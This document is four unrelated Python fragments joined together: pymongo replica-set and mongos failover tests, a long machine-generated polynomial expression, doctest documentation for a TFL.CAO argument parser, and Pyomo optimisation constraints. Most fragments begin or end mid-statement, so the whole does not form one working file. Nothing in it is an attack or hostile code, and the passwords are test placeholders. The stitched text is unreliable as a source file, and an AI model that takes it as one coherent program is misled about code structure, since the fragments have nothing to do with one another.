new_host = utils.read_from_which_host(c, mode1)
if host != new_host:
# Reading with a different mode unpinned, hooray!
break
else:
self.fail(
"Changing from mode %s to mode %s never unpinned" % (
modes[mode0], modes[mode1]))
# Now verify changing the tag_sets unpins the member.
tags0 = [{'a': 'a'}, {}]
tags1 = [{'a': 'x'}, {}]
for _ in range(1000):
host = utils.read_from_which_host(c, NEAREST, tags0)
new_host = utils.read_from_which_host(c, NEAREST, tags1)
if host != new_host:
break
else:
self.fail(
"Changing from tags %s to tags %s never unpinned" % (
tags0, tags1))
# Finally, verify changing the secondary_acceptable_latency_ms unpins
# the member.
for _ in range(1000):
host = utils.read_from_which_host(c, SECONDARY, None, 15)
new_host = utils.read_from_which_host(c, SECONDARY, None, 20)
if host != new_host:
break
else:
self.fail(
"Changing secondary_acceptable_latency_ms from 15 to 20"
" never unpinned")
def tearDown(self):
self.c.close()
super(TestReadPreference, self).tearDown()
class TestReplicaSetAuth(HATestCase):
def setUp(self):
members = [
{},
{'priority': 0},
{'priority': 0},
]
res = ha_tools.start_replica_set(members, auth=True)
self.c = MongoReplicaSetClient(res[0], replicaSet=res[1],
use_greenlets=use_greenlets)
# Add an admin user to enable auth
self.c.admin.add_user('admin', '<PASSWORD>')
self.c.admin.authenticate('admin', '<PASSWORD>')
self.db = self.c.pymongo_ha_auth
self.db.add_user('user', 'userpass')
self.c.admin.logout()
def test_auth_during_failover(self):
self.assertTrue(self.db.authenticate('user', 'userpass'))
self.assertTrue(self.db.foo.insert({'foo': 'bar'},
safe=True, w=3, wtimeout=3000))
self.db.logout()
self.assertRaises(OperationFailure, self.db.foo.find_one)
primary = self.c.primary
ha_tools.kill_members(['%s:%d' % primary], 2)
# Let monitor notice primary's gone
sleep(2 * MONITOR_INTERVAL)
self.assertFalse(primary == self.c.primary)
# Make sure we can still authenticate
self.assertTrue(self.db.authenticate('user', 'userpass'))
# And still query.
self.db.read_preference = PRIMARY_PREFERRED
self.assertEqual('bar', self.db.foo.find_one()['foo'])
def tearDown(self):
self.c.close()
super(TestReplicaSetAuth, self).tearDown()
class TestAlive(HATestCase):
def setUp(self):
members = [{}, {}]
self.seed, self.name = ha_tools.start_replica_set(members)
def test_alive(self):
primary = ha_tools.get_primary()
secondary = ha_tools.get_random_secondary()
primary_cx = MongoClient(primary, use_greenlets=use_greenlets)
secondary_cx = MongoClient(secondary, use_greenlets=use_greenlets)
rsc = MongoReplicaSetClient(
self.seed, replicaSet=self.name, use_greenlets=use_greenlets)
try:
self.assertTrue(primary_cx.alive())
self.assertTrue(secondary_cx.alive())
self.assertTrue(rsc.alive())
ha_tools.kill_primary()
time.sleep(0.5)
self.assertFalse(primary_cx.alive())
self.assertTrue(secondary_cx.alive())
self.assertFalse(rsc.alive())
ha_tools.kill_members([secondary], 2)
time.sleep(0.5)
self.assertFalse(primary_cx.alive())
self.assertFalse(secondary_cx.alive())
self.assertFalse(rsc.alive())
finally:
rsc.close()
class TestMongosHighAvailability(HATestCase):
def setUp(self):
seed_list = ha_tools.create_sharded_cluster()
self.dbname = 'pymongo_mongos_ha'
self.client = MongoClient(seed_list)
self.client.drop_database(self.dbname)
def test_mongos_ha(self):
coll = self.client[self.dbname].test
self.assertTrue(coll.insert({'foo': 'bar'}))
first = '%s:%d' % (self.client.host, self.client.port)
ha_tools.kill_mongos(first)
# Fail first attempt
self.assertRaises(AutoReconnect, coll.count)
# Find new mongos
self.assertEqual(1, coll.count())
second = '%s:%d' % (self.client.host, self.client.port)
self.assertNotEqual(first, second)
ha_tools.kill_mongos(second)
# Fail first attempt
self.assertRaises(AutoReconnect, coll.count)
# Find new mongos
self.assertEqual(1, coll.count())
third = '%s:%d' % (self.client.host, self.client.port)
self.assertNotEqual(second, third)
ha_tools.kill_mongos(third)
# Fail first attempt
self.assertRaises(AutoReconnect, coll.count)
# We've killed all three, restart one.
ha_tools.restart_mongos(first)
# Find new mongos
self.assertEqual(1, coll.count())
def tearDown(self):
self.client.drop_database(self.dbname)
super(TestMongosHighAvailability, self).tearDown()
class TestReplicaSetRequest(HATestCase):
def setUp(self):
members = [{}, {}, {'arbiterOnly': True}]
res = ha_tools.start_replica_set(members)
self.c = MongoReplicaSetClient(res[0], replicaSet=res[1],
use_greenlets=use_greenlets,
auto_start_request=True)
def test_request_during_failover(self):
primary = _partition_node(ha_tools.get_primary())
| |
252588 * uk_153
+ 112908 * uk_154
+ 5929741 * uk_155
+ 7109137 * uk_156
+ 3177817 * uk_157
+ 8523109 * uk_158
+ 3809869 * uk_159
+ 4593241 * uk_16
+ 1703029 * uk_160
+ 10218313 * uk_161
+ 4567633 * uk_162
+ 2041753 * uk_163
+ 912673 * uk_164
+ 3969 * uk_17
+ 7056 * uk_18
+ 6111 * uk_19
+ 63 * uk_2
+ 756 * uk_20
+ 11403 * uk_21
+ 13671 * uk_22
+ 6111 * uk_23
+ 12544 * uk_24
+ 10864 * uk_25
+ 1344 * uk_26
+ 20272 * uk_27
+ 24304 * uk_28
+ 10864 * uk_29
+ 112 * uk_3
+ 9409 * uk_30
+ 1164 * uk_31
+ 17557 * uk_32
+ 21049 * uk_33
+ 9409 * uk_34
+ 144 * uk_35
+ 2172 * uk_36
+ 2604 * uk_37
+ 1164 * uk_38
+ 32761 * uk_39
+ 97 * uk_4
+ 39277 * uk_40
+ 17557 * uk_41
+ 47089 * uk_42
+ 21049 * uk_43
+ 9409 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 251138340208 * uk_47
+ 217503741073 * uk_48
+ 26907679308 * uk_49
+ 12 * uk_5
+ 405857496229 * uk_50
+ 486580534153 * uk_51
+ 217503741073 * uk_52
+ 187944057 * uk_53
+ 334122768 * uk_54
+ 289374183 * uk_55
+ 35798868 * uk_56
+ 539966259 * uk_57
+ 647362863 * uk_58
+ 289374183 * uk_59
+ 181 * uk_6
+ 593996032 * uk_60
+ 514442992 * uk_61
+ 63642432 * uk_62
+ 959940016 * uk_63
+ 1150867312 * uk_64
+ 514442992 * uk_65
+ 445544377 * uk_66
+ 55118892 * uk_67
+ 831376621 * uk_68
+ 996733297 * uk_69
+ 217 * uk_7
+ 445544377 * uk_70
+ 6818832 * uk_71
+ 102850716 * uk_72
+ 123307212 * uk_73
+ 55118892 * uk_74
+ 1551331633 * uk_75
+ 1859883781 * uk_76
+ 831376621 * uk_77
+ 2229805417 * uk_78
+ 996733297 * uk_79
+ 97 * uk_8
+ 445544377 * uk_80
+ 250047 * uk_81
+ 444528 * uk_82
+ 384993 * uk_83
+ 47628 * uk_84
+ 718389 * uk_85
+ 861273 * uk_86
+ 384993 * uk_87
+ 790272 * uk_88
+ 684432 * uk_89
+ 2242306609 * uk_9
+ 84672 * uk_90
+ 1277136 * uk_91
+ 1531152 * uk_92
+ 684432 * uk_93
+ 592767 * uk_94
+ 73332 * uk_95
+ 1106091 * uk_96
+ 1326087 * uk_97
+ 592767 * uk_98
+ 9072 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 138348 * uk_100
+ 164052 * uk_101
+ 84672 * uk_102
+ 2109807 * uk_103
+ 2501793 * uk_104
+ 1291248 * uk_105
+ 2966607 * uk_106
+ 1531152 * uk_107
+ 790272 * uk_108
+ 2685619 * uk_109
+ 6582067 * uk_11
+ 2163952 * uk_110
+ 231852 * uk_111
+ 3535743 * uk_112
+ 4192657 * uk_113
+ 2163952 * uk_114
+ 1743616 * uk_115
+ 186816 * uk_116
+ 2848944 * uk_117
+ 3378256 * uk_118
+ 1743616 * uk_119
+ 5303536 * uk_12
+ 20016 * uk_120
+ 305244 * uk_121
+ 361956 * uk_122
+ 186816 * uk_123
+ 4654971 * uk_124
+ 5519829 * uk_125
+ 2848944 * uk_126
+ 6545371 * uk_127
+ 3378256 * uk_128
+ 1743616 * uk_129
+ 568236 * uk_13
+ 1404928 * uk_130
+ 150528 * uk_131
+ 2295552 * uk_132
+ 2722048 * uk_133
+ 1404928 * uk_134
+ 16128 * uk_135
+ 245952 * uk_136
+ 291648 * uk_137
+ 150528 * uk_138
+ 3750768 * uk_139
+ 8665599 * uk_14
+ 4447632 * uk_140
+ 2295552 * uk_141
+ 5273968 * uk_142
+ 2722048 * uk_143
+ 1404928 * uk_144
+ 1728 * uk_145
+ 26352 * uk_146
+ 31248 * uk_147
+ 16128 * uk_148
+ 401868 * uk_149
+ 10275601 * uk_15
+ 476532 * uk_150
+ 245952 * uk_151
+ 565068 * uk_152
+ 291648 * uk_153
+ 150528 * uk_154
+ 6128487 * uk_155
+ 7267113 * uk_156
+ 3750768 * uk_157
+ 8617287 * uk_158
+ 4447632 * uk_159
+ 5303536 * uk_16
+ 2295552 * uk_160
+ 10218313 * uk_161
+ 5273968 * uk_162
+ 2722048 * uk_163
+ 1404928 * uk_164
+ 3969 * uk_17
+ 8757 * uk_18
+ 7056 * uk_19
+ 63 * uk_2
+ 756 * uk_20
+ 11529 * uk_21
+ 13671 * uk_22
+ 7056 * uk_23
+ 19321 * uk_24
+ 15568 * uk_25
+ 1668 * uk_26
+ 25437 * uk_27
+ 30163 * uk_28
+ 15568 * uk_29
+ 139 * uk_3
+ 12544 * uk_30
+ 1344 * uk_31
+ 20496 * uk_32
+ 24304 * uk_33
+ 12544 * uk_34
+ 144 * uk_35
+ 2196 * uk_36
+ 2604 * uk_37
+ 1344 * uk_38
+ 33489 * uk_39
+ 112 * uk_4
+ 39711 * uk_40
+ 20496 * uk_41
+ 47089 * uk_42
+ 24304 * uk_43
+ 12544 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 311680618651 * uk_47
+ 251138340208 * uk_48
+ 26907679308 * uk_49
+ 12 * uk_5
+ 410342109447 * uk_50
+ 486580534153 * uk_51
+ 251138340208 * uk_52
+ 187944057 * uk_53
+ 414670221 * uk_54
+ 334122768 * uk_55
+ 35798868 * uk_56
+ 545932737 * uk_57
+ 647362863 * uk_58
+ 334122768 * uk_59
+ 183 * uk_6
+ 914907313 * uk_60
+ 737191504 * uk_61
+ 78984804 * uk_62
+ 1204518261 * uk_63
+ 1428308539 * uk_64
+ 737191504 * uk_65
+ 593996032 * uk_66
+ 63642432 * uk_67
+ 970547088 * uk_68
+ 1150867312 * uk_69
+ 217 * uk_7
+ 593996032 * uk_70
+ 6818832 * uk_71
+ 103987188 * uk_72
+ 123307212 * uk_73
+ 63642432 * uk_74
+ 1585804617 * uk_75
+ 1880434983 * uk_76
+ 970547088 * uk_77
+ 2229805417 * uk_78
+ 1150867312 * uk_79
+ 112 * uk_8
+ 593996032 * uk_80
+ 250047 * uk_81
+ 551691 * uk_82
+ 444528 * uk_83
+ 47628 * uk_84
+ 726327 * uk_85
+ 861273 * uk_86
+ 444528 * uk_87
+ 1217223 * uk_88
+ 980784 * uk_89
+ 2242306609 * uk_9
+ 105084 * uk_90
+ 1602531 * uk_91
+ 1900269 * uk_92
+ 980784 * uk_93
+ 790272 * uk_94
+ 84672 * uk_95
+ 1291248 * uk_96
+ 1531152 * uk_97
+ 790272 * uk_98
+ 9072 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 139860 * uk_100
+ 164052 * uk_101
+ 105084 * uk_102
+ 2156175 * uk_103
+ 2529135 * uk_104
+ 1620045 * uk_105
+ 2966607 * uk_106
+ 1900269 * uk_107
+ 1217223 * uk_108
+ 5639752 * uk_109
+ 8428834 * uk_11
+ 4404076 * uk_110
+ 380208 * uk_111
+ 5861540 * uk_112
+ 6875428 * uk_113
+ 4404076 * uk_114
+ 3439138 * uk_115
+ 296904 * uk_116
+ 4577270 * uk_117
+ 5369014 * uk_118
+ 3439138 * uk_119
+ 6582067 * uk_12
+ 25632 * uk_120
+ 395160 * uk_121
+ 463512 * uk_122
+ 296904 * uk_123
+ 6092050 * uk_124
+ 7145810 * uk_125
+ 4577270 * uk_126
+ 8381842 * uk_127
+ 5369014 * uk_128
+ 3439138 * uk_129
+ 568236 * uk_13
+ 2685619 * uk_130
+ 231852 * uk_131
+ 3574385 * uk_132
+ 4192657 * uk_133
+ 2685619 * uk_134
+ 20016 * uk_135
+ 308580 * uk_136
+ 361956 * uk_137
+ 231852 * uk_138
+ 4757275 * uk_139
+ 8760305 * uk_14
+ 5580155 * uk_140
+ 3574385 * uk_141
+ 6545371 * uk_142
+ 4192657 * uk_143
+ 2685619 * uk_144
+ 1728 * | |
The values for arguments and options can be
parsed from :data:`sys.argv` or supplied by a client via keyword arguments.
A command is defined by creating an instance of :class:`Cmd`
with the :meth:`~Cmd.__init__` arguments defining the command's arguments,
options, and possibly sub-commands.
Calling a :class:`Cmd` instance with an argument array, e.g.,
:data:`sys.argv[1:]`, parses the arguments and options in the array, stores
their values in an :class:`CAO` instance, and calls the `handler`.
Calling a :class:`Cmd` instance with keyword arguments initializes
the argument and option values from those values and calls the
`handler`.
Alternatively, the methods :meth:`~Cmd.parse` or :meth:`~Cmd.use` can be
called by a client directly, should explicit flow control be required.
A typical use of :class:`Cmd` looks like::
>>> def main (cao) :
... "Explanation of the purpose of the command"
... print ("Starting", cao._name)
... for fn in cao.argv :
... if cao.verbose :
... print (" " * cao.indent, "processing", fn)
... ### do whatever needs to be done
... print ("Finished", cao._name)
...
>>> cmd = TFL.CAO.Cmd \
... ( handler = main
... , args = ( "file:P?File(s) to process",)
... , opts =
... ( "indent:I=4?Number of spaces to use for indentation"
... , "-output:P"
... "?Name of file to receive output (default: standard output)"
... , "-period:I,#10?Periods to consider"
... , "-verbose:B?Print additional information to standard error"
... , Opt.Config
... ( name = "config"
... , auto_split = ":::"
... , description = "File(s) with configuration options"
... )
... , Opt.Config_Bundle
... ( name = "special_config"
... , description = "Predefined set of configuration options"
... , config_dct = dict (indent = 2, period = 8)
... )
... )
... , min_args = 2
... , max_args = 8
... , name = "cao_example"
... )
>>> if __name__ == "__main__" :
... cmd ()
`cmd` contains the specification of arguments and options. ::
>>> type (cmd.indent)
<class 'CAO.Int'>
>>> cmd.indent
'indent:I=4#1?Number of spaces to use for indentation'
>>> print_prepr ((cmd.indent.name, cmd.indent.default, cmd.indent.description, cmd.indent.auto_split, cmd.indent.max_number))
('indent', [4], 'Number of spaces to use for indentation', '', 1)
>>> type (cmd.verbose)
<class 'CAO.Bool'>
>>> cmd.verbose
'-verbose:B=False#1?Print additional information to standard error'
The methods :meth:`~Cmd.parse` and :meth:`~Cmd.use` return an instance of
:class:`CAO` which provides access to all argument and option values
specified. ::
>>> with expect_except (Err) :
... cao = cmd.parse (["-verbose"])
Err: Command/argument/option error: Need at least 2 arguments, got 0
>>> cao = cmd.parse (["-verbose", "path1", "path2"])
>>> print (cao.indent, type (cao.indent).__name__)
4 int
>>> print (cao.output)
None
>>> print (cao.verbose)
True
>>> cao.argn
2
>>> print_prepr (cao.argv)
['path1', 'path2']
>>> print_prepr (cao.file)
'path1'
>>> cao ()
Starting cao_example
processing path1
processing path2
Finished cao_example
>>> cmd.help (cao)
cao_example file ...
Explanation of the purpose of the command
<BLANKLINE>
file : Path
File(s) to process
<BLANKLINE>
argv : ['path1', 'path2']
<BLANKLINE>
-Pdb_on_Exception : Bool
Start python debugger pdb on exception
-config : Config [] split on ':::'
File(s) with configuration options
In case of multiple matching config files, the last value
specified for an option wins. Non-existing path values specified
for `-config` will be silently ignored.
-help : Help [] split on ','
Display help about command
-indent : Int
Number of spaces to use for indentation
-output : Path
Name of file to receive output (default: standard output)
-period : Int [10] split on ','
Periods to consider
-special_config : Config_Bundle
Predefined set of configuration options
{ 'indent' : 2
, 'period' : 8
}
-verbose : Bool
Print additional information to standard error
>>> cao_p = cmd.parse (["-period=1,2,3", "path1", "-period", "4", "path2"])
>>> cao_p ()
Starting cao_example
Finished cao_example
>>> print (cao_p.period, type (cao_p.period).__name__)
[1, 2, 3, 4] list
>>> print_prepr (cao_p ["period"])
[1, 2, 3, 4]
>>> print_prepr (cao_p ["period:raw"])
['1,2,3', '4']
>>> cmd.help (cao_p, spec = ["vals"])
Actual option and argument values of cao_example
-Pdb_on_Exception = False
-config = None
()
-help = []
-indent = 4
-output = None
()
-period = [ '1,2,3'
, '4'
]
[ 1
, 2
, 3
, 4
]
-special_config = {}
-verbose = False
file = path1
>>> cao_s = cmd.parse (["-special_config", "path1", "path2"])
>>> cmd.help (cao_s)
cao_example file ...
Explanation of the purpose of the command
<BLANKLINE>
file : Path
File(s) to process
<BLANKLINE>
argv : ['path1', 'path2']
<BLANKLINE>
-Pdb_on_Exception : Bool
Start python debugger pdb on exception
-config : Config [] split on ':::'
File(s) with configuration options
In case of multiple matching config files, the last value
specified for an option wins. Non-existing path values specified
for `-config` will be silently ignored.
-help : Help [] split on ','
Display help about command
-indent : Int
Number of spaces to use for indentation
-output : Path
Name of file to receive output (default: standard output)
-period : Int [10] split on ','
Periods to consider
-special_config : Config_Bundle
Predefined set of configuration options
{ 'indent' : 2
, 'period' : 8
}
-verbose : Bool
Print additional information to standard error
>>> cmd.help (cao_s, spec = ["vals"])
Actual option and argument values of cao_example
-Pdb_on_Exception = False
-config = None
()
-help = []
-indent = 2
-output = None
()
-period = 8
[8]
-special_config = True
{ 'indent' : 2
, 'period' : 8
}
-verbose = False
file = path1
>>> cmd.help (cao_s, spec = ["config"])
Configuration options
cao_example has the configuration options:
<BLANKLINE>
config
<BLANKLINE>
Each of these options can specify any number of configuration files. The
config options will be processed in the sequence given above; for each
config option, its files will be processed in the sequence they are
specified on the command line (or by the default for the option in
question). Config files that don't exist are silently ignored.
<BLANKLINE>
Each config file must contain assignments in python syntax, the assigned
values must be python strings, i.e., raw values.
<BLANKLINE>
Assignments to the name of arguments or options will override the default
for the argument/option in question. If one specific argument/option is
assigned to in several config files, the last assignment wins.
<BLANKLINE>
Assignments to names that aren't names of arguments or options will be
interpreted as keyword assignments.
<BLANKLINE>
A typical config file looks like (assuming that all lines start in column
1, i.e., without leading whitespace)
<BLANKLINE>
cookie_salt = b"<PASSWORD>"
<BLANKLINE>
input_encoding = "utf-8"
<BLANKLINE>
locale_code = "en"
"""
### «text» ### start of doctest
__test__ = dict \
( test = """
Usage examples
----------------
Many of the following tests/examples pass a simple `show` function as
`handler`. `show` just displays some information about the command and the
values passed to it::
>>> cmd = Cmd (show, name = "Test", args = ("adam:P=/tmp/test?First arg", "bert:I=42"), opts = ("-verbose:B", "-year:I,=2010"))
>>> cmd._arg_list
['adam:P=/tmp/test#1?First arg', 'bert:I=42#1?']
>>> sorted (str (o) for o in pyk.itervalues (cmd._opt_dict))
["'-Pdb_on_Exception:B=False#1?Start python debugger pdb on exception'", "'-help Display help about command'", "'-verbose:B=False#1?'", "'year:I,=2010#0?'"]
>>> cmd.adam, cmd.verbose
('adam:P=/tmp/test#1?First arg', '-verbose:B=False#1?')
>>> cmd.adam.__class__
<class 'CAO.Path'>
>>> cmd (["-year=2000", "-year", "1999", "-v=no", "/tmp/tmp"])
Test
Arguments : ['adam', 'bert']
-Pdb_on_Exception : False
-help : []
-verbose : False
-year : [2000, 1999]
adam : '/tmp/tmp'
bert : 42
argv : ['/tmp/tmp', 42]
>>> cao = cmd.parse (["-year=2000", "-year", "1999", "-v=no", "/tmp/tmp"])
>>> cao.year
[2000, 1999]
>>> cao.verbose
False
>>> print_prepr (cao.adam)
'/tmp/tmp'
>>> cao.bert
42
>>> print_prepr (cao.argv)
['/tmp/tmp', 42]
>>> cmd (["-year=2000", "-year", "1999", "-verb", "/tmp/tmp", "137"])
Test
Arguments : ['adam', 'bert']
-Pdb_on_Exception : False
-help : []
-verbose : True
-year : [2000, 1999]
adam : '/tmp/tmp'
bert : 137
argv : ['/tmp/tmp', 137]
>>> cap = cmd.parse (["-year=2000", "-year", "1999", "-verb", "/tmp/tmp", "137"])
>>> cap.verbose
True
>>> print_prepr (cap.argv)
['/tmp/tmp', 137]
>>> caq = cmd.parse (["/tmp/tmp", "137"])
>>> caq.verbose
False
>>> c1 = Cmd (show, name = "one", args = ("aaa:S", "bbb:S"), opts = ("y:I", "Z:B"))
>>> c1 ([])
one
Arguments : ['aaa', 'bbb']
-Pdb_on_Exception : False
-Z : False
- 1.25*log(1 + m.x724/(1e-6 + m.b985)))*(1e-6 + m.b985) <= 0)
m.c803 = Constraint(expr= m.x725 == 0)
m.c804 = Constraint(expr= m.x726 == 0)
m.c805 = Constraint(expr= m.x727 == 0)
m.c806 = Constraint(expr= m.x758 == 0)
m.c807 = Constraint(expr= m.x759 == 0)
m.c808 = Constraint(expr= m.x760 == 0)
m.c809 = Constraint(expr= m.x302 - m.x722 - m.x725 == 0)
m.c810 = Constraint(expr= m.x303 - m.x723 - m.x726 == 0)
m.c811 = Constraint(expr= m.x304 - m.x724 - m.x727 == 0)
m.c812 = Constraint(expr= m.x317 - m.x752 - m.x758 == 0)
m.c813 = Constraint(expr= m.x318 - m.x753 - m.x759 == 0)
m.c814 = Constraint(expr= m.x319 - m.x754 - m.x760 == 0)
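# The pairs of inequalities below (c815-c826 and the analogous groups that
# follow) appear to be big-M / disjunctive bounds: for a binary b and bound M,
#   x_on  - M*b <= 0   forces x_on  = 0 when b = 0, and
#   x_off + M*b <= M   forces x_off = 0 when b = 1,
# which ties each pair of split flow variables to its unit-selection binary.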
m.c815 = Constraint(expr= m.x722 - 0.705049913072943*m.b983 <= 0)
m.c816 = Constraint(expr= m.x723 - 0.705049913072943*m.b984 <= 0)
m.c817 = Constraint(expr= m.x724 - 0.705049913072943*m.b985 <= 0)
m.c818 = Constraint(expr= m.x725 + 0.705049913072943*m.b983 <= 0.705049913072943)
m.c819 = Constraint(expr= m.x726 + 0.705049913072943*m.b984 <= 0.705049913072943)
m.c820 = Constraint(expr= m.x727 + 0.705049913072943*m.b985 <= 0.705049913072943)
m.c821 = Constraint(expr= m.x752 - 0.666992981045719*m.b983 <= 0)
m.c822 = Constraint(expr= m.x753 - 0.666992981045719*m.b984 <= 0)
m.c823 = Constraint(expr= m.x754 - 0.666992981045719*m.b985 <= 0)
m.c824 = Constraint(expr= m.x758 + 0.666992981045719*m.b983 <= 0.666992981045719)
m.c825 = Constraint(expr= m.x759 + 0.666992981045719*m.b984 <= 0.666992981045719)
m.c826 = Constraint(expr= m.x760 + 0.666992981045719*m.b985 <= 0.666992981045719)
m.c827 = Constraint(expr=(m.x764/(1e-6 + m.b986) - 0.9*log(1 + m.x728/(1e-6 + m.b986)))*(1e-6 + m.b986) <= 0)
m.c828 = Constraint(expr=(m.x765/(1e-6 + m.b987) - 0.9*log(1 + m.x729/(1e-6 + m.b987)))*(1e-6 + m.b987) <= 0)
m.c829 = Constraint(expr=(m.x766/(1e-6 + m.b988) - 0.9*log(1 + m.x730/(1e-6 + m.b988)))*(1e-6 + m.b988) <= 0)
m.c830 = Constraint(expr= m.x731 == 0)
m.c831 = Constraint(expr= m.x732 == 0)
m.c832 = Constraint(expr= m.x733 == 0)
m.c833 = Constraint(expr= m.x770 == 0)
m.c834 = Constraint(expr= m.x771 == 0)
m.c835 = Constraint(expr= m.x772 == 0)
m.c836 = Constraint(expr= m.x305 - m.x728 - m.x731 == 0)
m.c837 = Constraint(expr= m.x306 - m.x729 - m.x732 == 0)
m.c838 = Constraint(expr= m.x307 - m.x730 - m.x733 == 0)
m.c839 = Constraint(expr= m.x320 - m.x764 - m.x770 == 0)
m.c840 = Constraint(expr= m.x321 - m.x765 - m.x771 == 0)
m.c841 = Constraint(expr= m.x322 - m.x766 - m.x772 == 0)
m.c842 = Constraint(expr= m.x728 - 0.705049913072943*m.b986 <= 0)
m.c843 = Constraint(expr= m.x729 - 0.705049913072943*m.b987 <= 0)
m.c844 = Constraint(expr= m.x730 - 0.705049913072943*m.b988 <= 0)
m.c845 = Constraint(expr= m.x731 + 0.705049913072943*m.b986 <= 0.705049913072943)
m.c846 = Constraint(expr= m.x732 + 0.705049913072943*m.b987 <= 0.705049913072943)
m.c847 = Constraint(expr= m.x733 + 0.705049913072943*m.b988 <= 0.705049913072943)
m.c848 = Constraint(expr= m.x764 - 0.480234946352917*m.b986 <= 0)
m.c849 = Constraint(expr= m.x765 - 0.480234946352917*m.b987 <= 0)
m.c850 = Constraint(expr= m.x766 - 0.480234946352917*m.b988 <= 0)
m.c851 = Constraint(expr= m.x770 + 0.480234946352917*m.b986 <= 0.480234946352917)
m.c852 = Constraint(expr= m.x771 + 0.480234946352917*m.b987 <= 0.480234946352917)
m.c853 = Constraint(expr= m.x772 + 0.480234946352917*m.b988 <= 0.480234946352917)
m.c854 = Constraint(expr=(m.x776/(1e-6 + m.b989) - log(1 + m.x707/(1e-6 + m.b989)))*(1e-6 + m.b989) <= 0)
m.c855 = Constraint(expr=(m.x777/(1e-6 + m.b990) - log(1 + m.x708/(1e-6 + m.b990)))*(1e-6 + m.b990) <= 0)
m.c856 = Constraint(expr=(m.x778/(1e-6 + m.b991) - log(1 + m.x709/(1e-6 + m.b991)))*(1e-6 + m.b991) <= 0)
m.c857 = Constraint(expr= m.x713 == 0)
m.c858 = Constraint(expr= m.x714 == 0)
m.c859 = Constraint(expr= m.x715 == 0)
m.c860 = Constraint(expr= m.x779 == 0)
m.c861 = Constraint(expr= m.x780 == 0)
m.c862 = Constraint(expr= m.x781 == 0)
m.c863 = Constraint(expr= m.x296 - m.x707 - m.x713 == 0)
m.c864 = Constraint(expr= m.x297 - m.x708 - m.x714 == 0)
m.c865 = Constraint(expr= m.x298 - m.x709 - m.x715 == 0)
m.c866 = Constraint(expr= m.x323 - m.x776 - m.x779 == 0)
m.c867 = Constraint(expr= m.x324 - m.x777 - m.x780 == 0)
m.c868 = Constraint(expr= m.x325 - m.x778 - m.x781 == 0)
m.c869 = Constraint(expr= m.x707 - 0.994083415506506*m.b989 <= 0)
m.c870 = Constraint(expr= m.x708 - 0.994083415506506*m.b990 <= 0)
m.c871 = Constraint(expr= m.x709 - 0.994083415506506*m.b991 <= 0)
m.c872 = Constraint(expr= m.x713 + 0.994083415506506*m.b989 <= 0.994083415506506)
m.c873 = Constraint(expr= m.x714 + 0.994083415506506*m.b990 <= 0.994083415506506)
m.c874 = Constraint(expr= m.x715 + 0.994083415506506*m.b991 <= 0.994083415506506)
m.c875 = Constraint(expr= m.x776 - 0.690184503917672*m.b989 <= 0)
m.c876 = Constraint(expr= m.x777 - 0.690184503917672*m.b990 <= 0)
m.c877 = Constraint(expr= m.x778 - 0.690184503917672*m.b991 <= 0)
m.c878 = Constraint(expr= m.x779 + 0.690184503917672*m.b989 <= 0.690184503917672)
m.c879 = Constraint(expr= m.x780 + 0.690184503917672*m.b990 <= 0.690184503917672)
m.c880 = Constraint(expr= m.x781 + 0.690184503917672*m.b991 <= 0.690184503917672)
m.c881 = Constraint(expr= - 0.9*m.x734 + m.x782 == 0)
m.c882 = Constraint(expr= - 0.9*m.x735 + m.x783 == 0)
m.c883 = Constraint(expr= - 0.9*m.x736 + m.x784 == 0)
m.c884 = Constraint(expr= m.x737 == 0)
m.c885 = Constraint(expr= m.x738 == 0)
m.c886 = Constraint(expr= m.x739 == 0)
m.c887 = Constraint(expr= m.x785 == 0)
m.c888 = Constraint(expr= m.x786 == 0)
m.c889 = Constraint(expr= m.x787 == 0)
m.c890 = Constraint(expr= m.x308 - m.x734 - m.x737 == 0)
m.c891 = Constraint(expr= m.x309 - m.x735 - m.x738 == 0)
m.c892 = Constraint(expr= m.x310 - m.x736 - m.x739 == 0)
m.c893 = Constraint(expr= m.x326 - m.x782 - m.x785 == 0)
m.c894 = Constraint(expr= m.x327 - m.x783 - m.x786 == 0)
m.c895 = Constraint(expr= m.x328 - m.x784 - m.x787 == 0)
m.c896 = Constraint(expr= m.x734 - 15*m.b992 <= 0)
m.c897 = Constraint(expr= m.x735 - 15*m.b993 <= 0)
m.c898 = Constraint(expr= m.x736 - 15*m.b994 <= 0)
m.c899 = Constraint(expr= m.x737 + 15*m.b992 <= 15)
m.c900 = Constraint(expr= m.x738 + 15*m.b993 <= 15)
m.c901 = Constraint(expr= m.x739 + 15*m.b994 <= 15)
m.c902 = Constraint(expr= m.x782 - 13.5*m.b992 <= 0)
m.c903 = Constraint(expr= m.x783 - 13.5*m.b993 <= 0)
m.c904 = Constraint(expr= m.x784 - 13.5*m.b994 <= 0)
m.c905 = Constraint(expr= m.x785 + 13.5*m.b992 <= 13.5)
m.c906 = Constraint(expr= m.x786 + 13.5*m.b993 <= 13.5)
m.c907 = Constraint(expr= m.x787 + 13.5*m.b994 <= 13.5)
m.c908 = Constraint(expr= - 0.6*m.x740 + m.x788 == 0)
m.c909 = Constraint(expr= - 0.6*m.x741 + m.x789 == 0)
m.c910 = Constraint(expr= - 0.6*m.x742 + m.x790 == 0)
m.c911 = Constraint(expr= m.x743 == 0)
m.c912 = Constraint(expr= m.x744 == 0)
m.c913 = Constraint(expr= m.x745 == 0)
m.c914 = Constraint(expr= m.x791 == 0)
m.c915 = Constraint(expr= m.x792 == 0)
m.c916 = Constraint(expr= m.x793 == 0)
m.c917 = Constraint(expr= m.x311 - m.x740 - m.x743 == 0)
m.c918 = Constraint(expr= m.x312 - m.x741 - m.x744 == 0)
m.c919 = Constraint(expr= m.x313 - m.x742 - m.x745 == 0)
m.c920 = Constraint(expr= m.x329 - m.x788 - m.x791 == 0)
m.c921 = Constraint(expr= m.x330 - m.x789 - m.x792 == 0)
m.c922 = Constraint(expr= m.x331 - m.x790 - m.x793 == 0)
m.c923 = Constraint(expr= m.x740 - 15*m.b995 <= 0)
m.c924 = Constraint(expr= m.x741 - 15*m.b996 <= 0)
m.c925 = Constraint(expr= m.x742 - 15*m.b997 <= 0)
m.c926 = Constraint(expr= m.x743 + 15*m.b995 <= 15)
m.c927 = Constraint(expr= m.x744 + 15*m.b996 <= 15)
m.c928 = Constraint(expr= m.x745 + 15*m.b997 <= 15)
m.c929 = Constraint(expr= m.x788 - 9*m.b995 <= 0)
